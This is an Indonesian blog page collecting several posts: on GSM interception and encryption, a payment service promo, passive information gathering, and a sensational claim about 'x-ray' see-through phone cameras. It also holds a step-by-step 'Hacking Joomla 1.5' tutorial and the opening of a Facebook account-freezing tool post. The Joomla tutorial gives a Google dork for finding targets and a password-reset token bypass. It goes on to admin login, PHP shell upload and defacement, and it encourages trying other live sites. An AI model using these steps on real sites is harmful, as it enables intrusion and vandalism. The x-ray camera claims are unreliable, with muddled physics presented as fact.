Featured Post 6

SEGENAP KOMUNITAS CYBERMEDIA COMMUNITY MENGUCAPKAN MINAL AIDHIN WAL FA IZIN MAAFKAN LAHIR DAN BATIN
Jika Anda Ingin Pasang Iklan Anda disitus Ini silahkan Hubungi Admin di 085294942040 (Poetra)

This is default featured post 1 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

This is default featured post 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

This is default featured post 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

Penyadapan Komunikasi Seluler

Kepopuleran teknologi komunikasi seluler tentu sudah tidak diragukan lagi. Saat ini terdapat sekitar 2,2 Milyar pengguna GSM diseluruh dunia. Di Indonesia saja total pemakai telpon seluler sudah lama melampaui jumlah sambungan telpon tetap Telkom. Salah satu keunggulan komunikasi seluler bagi pemakai yang sering diungkapkan adalah privasi. Kata anak-anak ABG, seluler jelas lebih mendukung privasi karena kegiatan curhat mereka dapat berlangsung dimana saja, tidak harus di ruang keluarga, dan tidak perlu khawatir penyadapan ortu lewat jalur paralel. Percaya atau tidak, asumsi ini bukan hanya dianut oleh kaum ABG, tapi juga oleh koruptor pemula yang lebih suka menyebut nomor rekening lewat SMS ketimbang lewat telpon kantor. Lantas apakah asumsi tentang privasi dalam komunikasi seluler tersebut memang benar? Sayangnya, seperti hampir semua kepercayaan masyarakat umum lainnya, asumsi tersebut juga hanyalah mitos belaka. Saya mengatakan demikian karena kenyataannya baik hacker, oknum operator, maupun pemerintah dan agen-agennya dapat dengan mudah menyadap pembicaraan seluler.

This is default featured post 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

Apakah Anda Ingin Iklan Anda Dipasangkan disini biayanya cuma Rp.50.000 perbulan

Minggu, 30 Desember 2012

Ekiosku.com jual beli online aman menyenangkan


lomba seo
Dengan Hadiah:
Juara 1: Uang tunai Rp 5.000.000,- (Lima Juta Rupiah)
Juara 2: Uang tunai Rp 3.000.000,- (Tiga Juta Rupiah)
Juara 3: Uang tunai Rp 1.500.000,- (Satu Juta Lima Ratus Ribu Rupiah)
Juara 4-10: Uang tunai Rp 500.000,- (Lima Ratus Ribu Rupiah)
Juara 11-20: Uang Tunai Rp. 250.000.- (Dua Ratus Lima Puluh Ribu Rupiah)

Kata Kunci Yang Dilombakan:
“Ekiosku.com jual beli online aman menyenangkan”

Syarat dan Ketentuan Lomba SEO Ekiosku.com:

PELAKSANAAN

  1. Dimulai 1 November 2012 pukul 12.00 WIB – 1 February 2013 pukul 12.00 WIB
  2. Pengumuman pemenang akan dikabarkan kepada peserta pada 21 Februari 2013.

PENDAFTARAN

  1. Peserta wajib mendaftar terlebih dahulu sebelum mengikuti Lomba SEO ekiosku.com melalui http://lombaseo.ekiosku.com/pendaftaran
  2. Peserta Lomba SEO ekiosku.com harus menaati dan menjalankan semua syarat serta ketentuan lomba tanpa terkecuali.
  3. Lomba SEO ekiosku.com ini tidak memungut biaya (Gratis).
  4. Peserta Lomba SEO ekiosku.com bebas, baik umur, status, maupun profesi.
  5. Setiap peserta dapat mendaftarkan domain berbeda dengan mencantumkan status nama, email, dan alamat yang sama dengan pada pedaftaran domain pertama atau sebelumnya.
  6. Setiap peserta Lomba SEO ekiosku.com harus mencantumkan alamat url postingannya atau url artikelnya, dan bukan nama domain web atau blognya. Artikel atau postingan yang tidak terdaftar dalam database kami tidak akan dianggap sebagai peserta lomba, sampai peserta tersebut mendaftarkan urlnya. daftar disini.

Sabtu, 31 Desember 2011

Penyadapan Komunikasi Seluler

Dengan semakin merakyatnya telepon seluler atau yang dikenal dengan handphone, keamanan menjadi masalah yang semakin penting.


Kepopuleran teknologi komunikasi seluler tentu sudah tidak diragukan lagi. Saat ini terdapat sekitar 2,2 Milyar pengguna GSM diseluruh dunia. Di Indonesia saja total pemakai telpon seluler sudah lama melampaui jumlah sambungan telpon tetap Telkom.

Salah satu keunggulan komunikasi seluler bagi pemakai yang sering diungkapkan adalah privasi. Kata anak-anak ABG, seluler jelas lebih mendukung privasi karena kegiatan curhat mereka dapat berlangsung dimana saja, tidak harus di ruang keluarga, dan tidak perlu khawatir penyadapan ortu lewat jalur paralel. Percaya atau tidak, asumsi ini bukan hanya dianut oleh kaum ABG, tapi juga oleh koruptor pemula yang lebih suka menyebut nomor rekening lewat SMS ketimbang lewat telpon kantor.

Lantas apakah asumsi tentang privasi dalam komunikasi seluler tersebut memang benar? Sayangnya, seperti hampir semua kepercayaan masyarakat umum lainnya, asumsi tersebut juga hanyalah mitos belaka. Saya mengatakan demikian karena kenyataannya baik hacker, oknum operator, maupun pemerintah dan agen-agennya dapat dengan mudah menyadap pembicaraan seluler.

Penyadapan In Action

Pada konferensi Blackhat 2008, David Hulton dan Steve menunjukan cara memecahkan enkripsi A5 yang dipakai dalam komunikasi GSM. Kelemahan A5 sebenarnya telah diketahui sejak beberapa tahun yang lalu, namun cara cracking yang didemonstrasikan dalam konferensi Blackhat meenunjukan bahwa hal ini dapat dilakukan dalam 30 menit secara pasif oleh siapapun yang berada dalam jangkauan sinyal, dan bersedia mengeluarkan uang sebesar 10 juta rupiah ( untuk hardwarenya ). Anda yang penasaran mengenai hal ini dapat mencari video presentasi terkait dari David Hulton melalui Youtube.

Atau contoh lainnya, alat keluaran ATIS systems GmbH ( Jerman ) yang dipakai KPK untuk melakukan penyadapan komunikasi seluler atas nama hukum ( lawful inspection ). Detil mengenai sistem ini katanya rahasia negara, tapi tentunya kita tahu bahwa model keamanan dengan rahasia-rahasiaan begini ( security through obscurity ) sudah ketinggalan jaman. Buktinya? Brosur detil mengenai perangkat penyadapan ATIS systems ini dapat didownload siapapun dari situs resmi perusahaan tersebut.

Multiple SimCard

Lantas bagaimana kalau Anda menggunakan beberapa SIM card pra-bayar sekaligus demi menjaga privasi? Bukanlah dengan begini paling tidak informasi yang disadap tidak bisa serta-merta diasosiasikan ke diri Anda?

Rupanya trik ini pun sudah ada yang membuat penangkalnya, yakni berupa sistem yang mampu menganalisa log dari beragam jenis sumber data untuk mengidentifikasi pengguna. Yang lebih menarik lagi, salah satu produk demikian keluaran perusahaan ThorpeGlen mendemonstrasikan fiturnya dengan menggunakan data dari Indonesia ( perhatikan format nomer telpon pada gambar dibawah ).


Sayangnya saat ini dokumen presentasi asli sudah dihapus dari situs ThorpeGlen. Untunglah Internet selalu dapat menyelamatkan informasi-informasi penting demikian, sehingga Anda yang ingin mengetahui lebih lanjut masih dapat mendownload copy dokumennya di URL berikut : http://wikileaks.org/wiki/UK_Company_Thorpeglen_spies_on_50_million_Indonesians_2008

Terkadang saya tersenyum sendiri mengingat solusi asal-bunyi yang ditawarkan sebagian orang ( termasuk para "pakar" security ) untuk menanggulangi masalah penyadapan. Mulai dari saran yang berlandaskan prinsip security through obscurity seperti penggunaan bahasa daerah atau sandi untuk berkomunikasi, sampai ke penerapan sistem mafia Sisilia yang lebih memilih tatap muka langsung meskipun mengorbankan efisien waktu maupun biaya transportasi. Anda bisa bayangkan kalau solusi berdasarkan prinsip demikian diterapkan secara luas, misalkan sampai ke sistem email internet yang sangat mudah disadap itu.

Lalu kalau begitu, solusi bagaimana yang sebenarnya praktis untuk diterapkan untuk menjaga privasi komunikasi seluler? Singkat saja, solusinya sebenarnya sama dengan cara untuk menjaga kerahasiaan dalam dunia digital lainnya termasuk email : gunakan enkripsi end-to-end berbasis algoritma yang aman!

Bagi yang belum mengerti, yang dimaksud dengan end-to-end disini adalah penerapan enkripsi secara langsung antar kedua handset yang berkomunikasi. Algoritma yang aman maksudnya adalah algoritma enkripsi yang sampai saat ini masih terbukti aman seperti AES-256.

Jadi berbeda dengan protokol GSM yang mengenkripsi ( meskipun sudah bisa dicrack ) komunikasi handset dengan sentral seluler secara transparan, dalam sistem enkripsi end-to-end ini Anda dan lawan bicara harus sama-sama menginstall software enkripsi tambahan dan melakukan pertukaran kunci kriptografi.

Sifat end-to-end menjamin bahwa tidak satupun pihak yang ada di tengah-tengah jalur komunikasi ( termasuk operator jaringan ) akan dapat mendekripsi paket pembicaraan. Sistem ini juga umumnya berjalan diatas TCP / IP, sehingga Anda dan lawan bicara harus menggunakan fasilitas data seperti GPRS/3G, atau mengaktifkan jalur CSD (Circuit Switched Data, jalur 9,6 Kbps yang biasa dipakai untuk dial-up GSM beberapa tahun lalu ).

Mungkin semua ini terdengar rumit dan sangat tidak praktis, tapi menurut pengamatan, di kalangan tertentu teknik enkripsi end-to-end akan dan bahkan telah digunakan untuk melindungi pertukaran informasi sensitif mereka.

Paypal Ala Indonesia

Paypal bukanlah kata yang asing bagi yang sering melakukan transaksi di internet karena Paypal menawarkan banyak kemudahan bagi konsumen maupun merchant ( penjual ). Tidak heran, paypal berkembang dengan sangat pesat namun sayang sekali, dukungan Paypal terhadap pasar dalam negri tercinta ini masih tidak maksimal. Entah melihat peluang ini atau yang lainnya, PayglopbalOne yang beralamat di www.payglobalone.com menyediakan layanan yang hampir sama dengan Paypal. Bisa dikatakan, inilah paypal rasa Indonesia.


Layaknya paypal, PayglobalOne yang diibaratkan dengan dompet internet ini memungkinkan Anda melakukan transaksi di internet dengan cara yang lebih mudah dan nyaman. Tentu saja, untuk berbelanja menggunakan dompet internet ini, Ada syarat yang harus dipenuhi.

Pertama Anda harus mengisi dompet digital Anda dengan uang Anda yang sebenarnya. Saat ini, solusi yang tersedia adalah dengan cara transfer melalui rekening bank Anda, bisa melalui internet banking ataupun ATM. Sayang sekali, saat ini bank yang didukung masih sangat terbatas, namun untunglah bank yang didukung ini adalah bank besar di tanah air yaitu BCA dan Mandiri. Bila Anda tidak mempunyai rekening didua bank besar ini, terpaksa Anda harus membuka rekening bank terlebih dahulu atau menunggu PG-1 ini mendukung bank yang Anda gunakan.

Pengisian dompet digital ini menurut pihak PG-1, hanya akan terjadi delay sekitar 15 menit saja semenjak Anda melakukan transfer. Artinya dompet Anda akan langsung terisi dengan jumlah uang yang telah Anda transfer, namun kondisi ini baru terjadi bila Anda melakukan transfer dengan aturan yang benar. Bila Anda melakukannya dengan cara yang salah, uang Anda tidak akan hilang, hanya akan membutuhkan waktu yang lebih lama agar dompet Anda bisa terisi karena membutuhkan pekerjaan manual menurut keterangan dari PG-1.

Syarat kedua untuk melakukan transaksi dengan PayglobalOne ini adalah adanya merchant atau situs tempat Anda melakukan transaksi yang juga menyediakan fasilitas pembayaran dengan PG-1. Saat ini, bisa dikatakan kekurangan dari PG-1 ini adalah kurangnya merchant yang menggunakannya namun kekurangan ini bisa ditutup dengan banyaknya program menarik yang diadakan oleh situs-situs yang sudah menggunakan PayglobalOne sebagai satu-satunya alat pembayaran seperti situs hipkuku.com dan jendelailmu.com.

PG-1 tidak membantah bahwa banyaknya program-program yang diadakan ini, bertujuan untuk meningkatkan jumlah pengguna PG-1. Solusi PG-1 ini akan semakin bermanfaat seiring dengan banyaknya pengguna PG-1 karena itu, PG-1 tidak tinggal diam dan mulai aktif mendekati beberapa potensial merchant untuk diajak kerjasama.

Sekarang, apa Anda sudah berkeinginan untuk membuat tabungan di dunia maya..??
Silahkan tunggu postingan dari IcHiNx Warehouse tentang Tutorial PG-1 yang akan datang..

Passive Information Gathering

Definisi


Passive itu artinya tidak aktif. Kondisi dimana kita dikenai aksi bukan melakukan aksi. Keadaan dimana kita tidak berbuat apa-apa tapi mendapatkan sesuatu. Information bukan data. Dua kata ini tidak bisa dipertukarkan karena secara hakiki beda artinya. Data adalah atribut suatu object. Informasi adalah pencerahan yang didapat setelah data diolah. Tanggal itu data, tapi tanggal ulang tahun itu informasi.

Gathering bukan berarti pesta atau acara kumpul-kumpul. Gathering disini artinya kegiatan mengumpulkan sesuatu. Jadi Passive Information Gathering adalah cara mengumpulkan informasi secara pasif alias tanpa melakukan tindakan aktif untuk " menangkap " informasi tersebut.

Lho koq bisa?

Imagine this... Anda di suatu pesta. Ada tamu pesta yang menarik perhatian Anda. Singkat cerita Anda langsung naksir berat mahluk misterius ini, tapi Anda pemalu. Bagaimana caranya mendapatkan informasi tentang mahluk itu tanpa langsung bertanya atau memerintahkan dedemit peliharaan Anda untuk pergi dan bertanya pada mahluk itu?

Bingung? Karena Anda terlanjur mikir yang kelewat canggih! Ada beberapa hal yang bisa di coba. Kalau dia punya peran khusus di acara itu. Anda bisa nyontek di daftar susunan acara, biasanya penanggung jawab disebutkan namanya. Atau Anda bisa menempatkan diri sedekat mungkin tapi dalam jarak yang tidak mencurigakan dari si dia.

Sebagai mahluk sosial, cepat atau lambat pasti bakal ada yang ngajak ngobrol mahluk incaran Anda ini bukan? Saat itu minimal Anda akan dapatkan nama panggilannya. Berbahagialah Anda kalau yang ngajak ngobrol si dia mengawali pembicaraan dengan " Eh... nomor hape loe berapa sih? Hape gua baru diformat... "

Atau kalau semua orang di acara itu memakai name tag ya tinggal konsentrasi dan membaca tanpa melanggar RUU pornoaksi atau pornografi.

Dan Seterusnya...
Bisa toh?

Kenapa perlu

Sekarang bayangkan si dia itu server di Network. Karena dia ada di network dan dia server, dia pasti " ngobrol " dengan mesin-mesin lainnya. Kalau tidak, bagaimana dia menjalankan fungsinya sebagai server?

Itulah yang dimaksud pakar sekuriti ketika mereka dengan separo bercanda mengajarkan pada Anda teknik pengamanan yang paling ampuh dan belum pernah dikalahkan, yaitu :

Cabut server dari network, masukan dalam brankas yang setelah kuncinya dibuang, kemudian kubur brankas itu kedalam tanah di padang pasir. Kenapa padang pasir? Karena hanya di padang pasir permukaan tanah itu berubah cepat. Begitu selesai ngubur dijamin Anda akan dengan cepat lupa nguburnya dimana!

Server tidak bisa 100% diamankan karena secara definitif ( artinya kalau syarat ini tidak terpenuhi dia berhenti jadi server ) dia tidak dibenarkan terisolir dari dunia luar.

Jadi awas jangan kelewat getol memprotek server Anda, bisa-bisa hadiahnya bukan kenaikan gaji tapi malah surat pemecatan karena servernya Anda protek begitu hebatnya, server itu tidak bisa dihubungi oleh SEMUA client yang ada!

Jadi kesimpulannya Passive Information Gathering harus dilakukan minimal untuk dua tujuan :
1. Memastikan server SELALU " ngoceh " seperlunya.
2. Memastikan server SELALU jalan sesuai fungsinya.

Jenis informasi yang bisa dikumpulkan secara passive?

Banyak. Contohnya :
1. Info-info DNS network
2. Info-info e-mail network
3. Info-info platform server di network
4. Info-info peranan server alias service apa yang running. Ini baik LAN maupun WAN bisa di gather secara passive dan sah.

Kalau Anda perhatikan semua info ini mau tidak mau harus di expose sebuah server ke network karena menjadi bagian dari cara server itu berkomunikasi dengan mesin lain di network dimana dia berada.

Bagaimana caranya

Macam-macam, tapi karena tempat terbatas saya bahas yang paling cihuy saja dengan online service yang bergelimangan di internet.

Kenapa Cihuy?

1. Gratis. Well virtually gratis. Akses ke internetnya biasanya " ada yang bayar ". Lho koq mukanya pada mesum? Berpikir positif... berpikir positif...

2. Gampang cara pakainya. It's a service... nuff said. Begitu ketemu tampilannya saja saya jamin Anda akan punya feeling apa yang mesti dilakukan tanpa belajar.

3. Selalu update.

4. Bisa diakses dari mana saja kapan saja selama Anda bisa online.

5. Legal. Did I say CIHUY?

Baik. Karena merupakan online service ( baca:cara akses tinggal mengunjungi situsnya saja ) langkah pengoprasian selain membuang waktu dan tempat untuk dibahas juga kesannya kurang belagu ( baca:kurang mendidik ) gitu. Jadi sebagai gantinya saya coba highlight saja kegunaan service-service online ini :



Buat mengetahui umur subscription sebuah domain, siapa yang menghandle pengurusan administrasi akun domain, lokasi hosting, silsilah network.



Buat mengetahui kesehatan sebuah domain. Yep service ini malah sudah include pengecekan, vonis dan nasehat perbaikan tentang bagaimana setup DNS yang baik dan benar.



Situs ini ngehost beberapa service basic sekaligus meski sudah di " upgrade " misalnya fungsi traceroute yang langsung dikonek ke database geografi sehingga jalurnya langsung muncul di peta dunia, kemudian tidak seperti traceroute service yang umumnya start dari server yang melakukan traceroute, situs ini juga menyediakan traceroute yang start dari PC Anda secara langsung!



Situs favorite saya karena hanya dengan memasukan IP atau domain server Anda akan mendapatkan laporan umum misalnya, konversi IP-URL, TraceRoute, Scanning Port, dan Whois.

Perhatian...

Keempat situs ini adalah situs-situs yang saya ketahui. Jadi masih banyak situs sejenis yang mungkin lebih baik dan lebih lengkap gatheringnya dibanding situs-situs yang saya sebutkan disini.

What's next?

Pada bagian " Kenapa perlu? " sebetulnya banyak yang bisa digali. Meski saya hanya list dua alasan untuk melakukan gathering ini tetapi kata " selalu " yang ada di kedua statement itu mengisyaratkan proses Passive Information Gathering ini nggak seratus persen sama analoginya dengan orang yang cari info tentang orang yang ditaksir.

Passive Information Gathering itu jiwanya adalah preventive ( pencegahan ). Dia hanya berguna buat Anda kalau Anda rajin dan gigih mengeksplore dan " berpatroli ". Kalau Anda model " sekali jadi " niscaya nasib Anda seperti foto polaroid yang " sekali jadi " juga ( dan terus langsung masuk tong sampah ).

Memastikan server selalu " ngoceh " seperlunya itu kurang lebih sama dengan :
1. Penetration testing.
2. Hardening.
3. Patching.

Memastikan server selalu jalan sesuai fungsinya itu kurang lebih sama dengan :
1. Troubleshooting.
2. Programming.
3. Monitoring.

Jadi dengan semangat preventive, nest yang bisa Anda kembangkan dari hasil Anda gather macam-macam informasi ini adalah :
1. Standarisasi ( ISO 27000, ISO 31000, COrbit, ITIL, ...dan seterusnya )
2. Bussiness continuity plan ( backup, DRC, CMDB... dan seterusnya )
3. Outsourcing ( Consulting, training, auditing, assessment... dan seterusnya )


Referensi :
http://www.technicalinfo.net

Kamera Tembus Pandang Sudah Banyak Beredar

Harap berhati-hati karena benar-benar terjadi....

'Handphone' Infra Me! rah Tembus Pandang Sudah Beredar


SEORANG wanita cantik telanjang keluar dari kolam berenang. Ia melenggang santai, tanpa terlihat risih berjalan mengitari kolam menuju kursi yang berjejer di tepian. Tidak lama berselang, gadis remaja berwajah lugu dengan postur bugil sedikit berlari melintas menuju kamar ganti usai berenang. Wanita-wanita yang tampak 'bugil' tersebut bukan orang gila. Mereka juga bukan kaum ekshibisionis yang gemar memperlihatkan tubuh telanjang.

Sesungguhnya mereka mengenakan pakaian renang. Namun, tubuh mereka jadi tampak telanjang hanya korban dari kecanggihan teknologi kamera tembus pandang yang terpasang di handphone (HP). Baju renang yang mereka pakai justru menjadi bahan sempurna yang dapat ditembus sinar infra merah. Handphone dengan kamera xray built-in itu memungkinkan para perempuan terlihat sia-sia menutupi tubuhnya dengan pakaian renang atau senam yang umumnya terbuat dari bahan sintetis.

Kamera tembus pandang! itu bekerja pada tinta, bahan-bahan sintetis seperti baju renang, baju senam, original silk (sutera asli). Tapi tidak berfungsi pada bahan lain seperti nilon, katun dan jins. Tidak ada sistem on/off untuk Xray, jadi HP tembus pandang akan selalu keadaan on, tetapi hanya berefek pada bahan sintetis. Target banyak terdapat di kolam renang, gym/fitness, pesta, dancer.


Tidak sulit mendapatkan perangkat 'nakal' tersebut. Bahkan dalam satu iklan yang terpampang jelas di sebuah situs internet. Dilengkapi dengan tarif modifikasi yang dibutuhkan untuk setiap HP. Biayanya, minimal satu juta rupiah untuk jenis Nokia 3660 dan Sonny Ericson K500. Untuk spesifikasi HP yang lebih canggih seperti Nokia 9500 atau XDA O2, diperlukan biaya sebesar dua juta rupiah. HP akan dirombak total, karenanya lupakan garansi jika kelak HP bermasalah.

Peminatnya tidak sedikit. Menurut Edu, penjual peranti tersebut, peminat HP tembus pandang berasal dari berbagai kalangan. "Harganya! kan tidak terlalu mahal, tetapi yang beli memang punya niat jahil betul. Tiap hari ada saja! yang beli," tambahnya sambil tertawa Menurutnya, kebanyakan peminat HP jenis itu memang laki-laki. Target mereka jelas, meneropong para perempuan yang di kolam renang umum dan tempat senam atau fitness. Karena di tempat itu, para kaum hawa memang menggunakan bahan pakaian yang memungkinkan untuk ditembus hingga ke permukaan kulit.

"Teknologi sih memang gila kalau dikuasai orang-orang yang tidak berakhlak," komentar pengamat teknologi informasi, Ono W Purbo blak-blakan, Jumat (10/06). Padahal, tadinya teknologi inframerah yang digunakan untuk menembus lapisan penghalang kulit hanya digunakan dalam teknologi militer.

"Teknologi itu biasanya dipakai dalam pengintaian malam hari. Secara sederhana, sinar infra red akan menangkap panas dari tubuh. Jadi, tubuh akan terlihat jelas meski dalam keadaan gelap," paparnya. Namun yang berkembang, teknologi semacam ini digu! nakan untuk hal-hal yang menjadikan kaum perempuan sebagai korban.


Adalah Kaya Spesial Optic, Inc, sebuah perusahaan asal Jepang yang mengenalkan produk yang disebut "Infrared See Through Filter PF". Perusahaan yang mengkhususkan diri pada alat optik selama 30 tahun itu memproduksi sebuah alat yang dapat menembus pandangan dibalik permukaan objek. Pada dasarnya, apa yang dilihat manusia adalah pantulan cahaya yang merepresentasikan bagian terbatas dari spektrum elektromagnetik. Ada syarat yang harus dipenuhi sebuah objek agar dapat terlihat mata manusia normal, yaitu panjang gelombang. Radiasi sinar nframerah tidak terlihat mata manusia normal karena panjang gelombangnya tidak memenuhi syarat. Plastik merupakan bahan yang dapat membelokkan radiasi inframerah masuk ke dalam klasifikasi gelombang terlihat.

Sementara baju renang dan senam terbuat dari bahan sintesis pabrik yang pada dasarnya adalah plastik. Akibatnya, jika sinar inframerah dikenakan pada permukaan sintetis, maka ia akan membelokkan gelombang sesuai dengan prasyarat mata normal. Selanjutnya, pantulan permukaan kulit dibalik baju berbahan sintetis akan terlihat jelas. Kebebasan untuk berenang di tempat umum atau berlatih kebugaran di pusat fitness menjadi terampas. HP yang dilengkapi dengan perangkat tersebut dapat digunakan kapan saja di tempat umum tanpa terlalu mencurigakan. Kegiatan merekam dan kemudian disimpan dalam memory card tidaklah hal yang rumit. Penyebarannya lebih mudah lagi. Transfer data yang didukung oleh kemudahan teknologi, dinikmati oleh sebagian besar pemilik HP.

Penikmatnya juga tidak sedikit. "Gue sih seneng-seneng aja kalau punya file seperti itu. Apalagi gratisan," ujar Agus, seorang pekerja swasta. Kepemilikan peranti tersebut tentu legal. Tapi yang menjadi masalah adalah ketika teknologi tersebut berubah menjadi teror yang mengganggu aktivitas normal. Sementara mekanisme hukum terlalu jauh di belakang kemajuan t! eknologi! yang membuka ruang bagi intimidasi.

Kalau modus kamera tersembunyi di toilet umum atau kamar ganti bisa sedikit diakali. Sikap hati-hati dan waspada akan semua titik-titik mencurigakan sebelum menggunakan ruang publik tersebut. Namun, keberadaan HP tembus pandang tidak seperti kamera tersembunyi HP ini tidak terlihat mencolok karena modifikasinya tidak akan menghasilkan perbedaan yang kentara secara fisik. Artinya, kolam renang umum bukan lagi tempat yang menyenangkan untuk berolahraga atau berekreasi melepas kepenatan.

Teknologi memang ibarat pisau bermata dua. Kegunaannya dapat menguntungkan sekaligus mengganggu orang lain Tapi, saat pemanfaatannya merugikan sebagian orang, akan ada reaksi yang muncul. "Bagaimanapun, yang menjadi mekanisme kontrol adalah masyarakat," ujar Onno. Dengan luasnya informasi yang sampai ke masyarakat, bukannya tidak mungkin akan timbul reaksi.

Perusahaan raksasa asal Jepang, Sonny, akhirnya menghentikan ! produksi handycam x-ray dan menarik kembali produk yang sudah dilepas di pasaran. Kebutuhan akan nama baik sebuah perusahaan besar membuat Sonny mengambil langkah yang merugi jika dilihat dari sisi ekonomi sebuah produksi.
[HRD - Derli]


Be careful gals..


Watch Out!!! Di Jakarta udah nggak ada kehidupan pribadi lagi. Saat anda berada di luar rumah, perhatikan hal-hal berikut:


1. Jangan sembarangan buang air (besar/kecil) di kamar mandi yang tidak jelas (pom bensin, wc umum mal/plaza, wc hotel dll).


2. Jangan melakukan aktivitas seksual (ciuman, raba-meraba dll) di dalam kendaraan.


3. Hati-hati bila membicarakan orang di dalam kendaraan umum atau menceritakan suatu rahasia (misalnya kalau anda membawa uang dalam jumlah besar ke teman anda).


4. Usahakan untuk tidak memakai pakaian/celana/rok dari bahan sintetis.




Penjelasan untuk point:




1. Hidden-camera (mini-camera) saat ini dijual bebas di Glodok dan harganya murah sekali per paket. Besarnya hanya sebesar uang logam Rp.50,- lama. Dan ini dapat dipasang di mana saja & dapat dilihat dengan jelas hasilnya;(Harga Rp.125.000,-an)


2. Kamera handphone dan kamera digital, di Glodok sudah bisa di-upgrade untuk dapat melihat tembus pandang seperti lensa kaca mata James Bond; (Harga Rp. 1.000.000,-an)


! 3. Ada alat penyadap suara berbentuk ear-phone dijual juga di Glodok untuk menyadap suara secara terbuka sejauh 20 meter. (Rp. 175.000,-an)


4. Lensa yang di-upgrade untuk kamera handphone atau digi-cam dapat menembus kain berbahan sintetis sehingga dapat melihat seseorang terlihat telanjang. (idem sama nomor 2)




Jadi, berhati-hatilah...

Hacking Joomla 1.5

CMS Joomla versi 1.5 s/d kebawah, banyak sekali menyimpan Bugs, dan salah satunya dengan menggunakan metode " Token Forgot Password " untuk mengganti password admin. Hal yang sudah dianggap biasa bagi para Hacker, yang selalu saja mencari lubang ( bugs ) dalam suatu Website.


Pada Joomla 1.5 ada sebuah bug “sederhana” yang berakibat fatal. Yaitu bug pada Password Reset yang bisa membuat seseorang yang tak bertanggung jawab mengubah password dari administrator situs yang bersangkutan. Begitu orang tersebut masuk menjadi Administrator maka dia bisa merusak situsnya, mengubah tampilan depan situs, bahkan jika Server tempat situs tersebut bernaung tidak aman orang tersebut bisa merusak situs lain yang satu server dengan mudah (lewat pintu belakang/backdoor).

Lihat detailnya disini.

Untungnya bug ini telah banyak di-patch di situs-situs yang berbasis Joomla 1.5 sehingga agak susah untuk menemukan situs yang masih bersarang bug ini mengingat bug ini udah cukup lama ditemukan. Tapi kita masih bisa mencarinya dengan mesin pencari di Google, kita bisa menemukan situs Joomla yang masih ada bugnya.

Mencari Target

Anda bisa memakai keyword khusus untuk mencari situs target dengan Google. Dengan memakai dork :

inurl:option=com_user

Dengan syntax inurl maka Google akan mencarikan situs yang mengandung kata yang kita tentukan. Mengapa harus “ option=com_user ”? Karena memang bugnya terdapat pada komponen com_user.


Kemudian dibelakang alamat situsnya Anda tambahkan ini :

http://situstarget.com/index.php?option=com_user&view=reset&layout=confirm

Ini adalah alamat untuk membawa kita ke kotak dialog Password Reset. Untuk bisa mereset passwordnya kita harus memasukkan kode Token dengan benar.


Tentunya kita tidak tahu kode Token yang benar. Tapi Anda bisa mengakalinya, yaitu dengan memasukkan karakter sakti ke dalam Text Box token. Yaitu :



Bisa terlihat gak? Itu adalah ‘ alias tanda petik satu. Jika bugnya belum dipatch maka akan muncul form untuk memasukkan password baru. Jika tidak muncul berarti kalian tidak beruntung dan cobalah situs yang lain.

Tapi tunggu dulu, Anda masih bisa mencari cara yang lebih baik untuk menemukan situs Joomla yang masih bersarang bug.

Anda bisa mencoba dengan keyword lain, sebagai contoh :

inurl:option=com_user inurl:blabla

Kata blabla diganti dengan kata yang kita inginkan ( terserah Anda ). Jadi situs yang muncul adalah situs yang mengandung kata com_user dan kata yang kita inginkan. Sehingga hasil pencarian tentunya akan berbeda dari pencarian sebelumnya dengan harapan dari sekian hasil googling ada beberapa situs yang ternyata bisa direset Password-nya dengan kode yang tadi.

Sebagai contoh, sang penulis menemukan sebuah situs Rusia yang ketika diisi Token-nya dengan tanda petik satu langsung keluar permintaan untuk membuat password baru.

Penetration

Isi password baru dengan yang diinginkan misalnya “ 123456 ″.


Walaupun passwordnya sudah diubah, kita harus tahu nama username Admin-nya untuk bisa login. Username default dari Joomla adalah admin. Tapi ada juga situs yang mengubah default usernamenya sehingga harus kita pintar menebak. Untungnya, menebak username Admin itu lebih gampang daripada menebak password. Coba aja “administrator”, “webadmin”, “adminweb”, dan sekitar-sekitarnya.

Langkah selanjutnya adalah login menjadi admin. Halaman admin Joomla terdapat di :

http://situstarget.com/administrator

Masukkan Username : admin. Password : 123456 (password yang udah di-reset tadi).

Setelah masuk ke halaman Admin, Anda bisa mengubah tulisan dengan seenaknya atau mengubah tampilan depan secara penuh alias DeFace. Untuk Deface, Anda harus mengupload PHPShell a.k.a. Backdoor ke server target atau memodifikasi theme-nya.

Deface

Untuk meng-upload Shell, gunakan Media Manager ( Site > Media Manager ) lalu upload disitu.

Tapi Anda bisa menggunakan cara lain jika Anda tidak mengerti cara menggunakannya, cukup dengan mengedit Template-nya ( Extensions > Template Manager ). Pilih template yang dijadikan default dan pilih Edit.


Setelah itu pilih Edit HTML.

Akan keluar Template HTML Editor. Setelah itu Anda bisa mengganti sesuai dengan keinginan Anda.

FYI :

Fungsi dari artikel ini hanya untuk memberikan Anda gambaran, bagaimana seorang Hacker bisa mendeface situs berbasis Joomla 1.5 yang memiliki bug.

Sebagai saran untuk Anda yang mempunyai situs yang memakai CMS Joomla 1.5 :

· Ganti default username dari Administrator. ( Jangan menggunakan nama yang umum ).

· Patch bug. Selalu update dengan informasi bug terbaru sehingga begitu ada info suatu bug apalagi bug yang mengancam keamanan situs Anda, sehingga Anda bisa langsung menutup lubang bug.

Hacking Facebook

Facebook sangat populer saat ini, bahkan karena facebook, banyak yang sudah jadi virtual villager (istilah yang saya buat sendiri untuk menggambarkan seseorang yangg freak terhadap internet) karena itulah banyak juga yang penasaran tentang facebook ini, terutama para hacker atau bahkan cracker.

Didalam artikel ini terdapat 2 cara yang biasa dilakukan oleh para hacker dalam melakukan misinya.

1. Dengan cara Freeze,

Banyak jalan menuju roma, itu mungkin prinsip para hacker-hacker dan cracker-cracker hebat dan pintar, karena itu mungkin, ada diantara mereka yang membuat sebuah tools untuk memfreeze akun orang lain hanya dengan mengetikkan emailnya, lalu buzz untuk sementara, orang itu tidak dapat login lagi di akun facebooknya, ajaib bukan?

Nama tools itu adalah "Ground Zeros Facebook Freezer", jika anda mau download bisa disini :

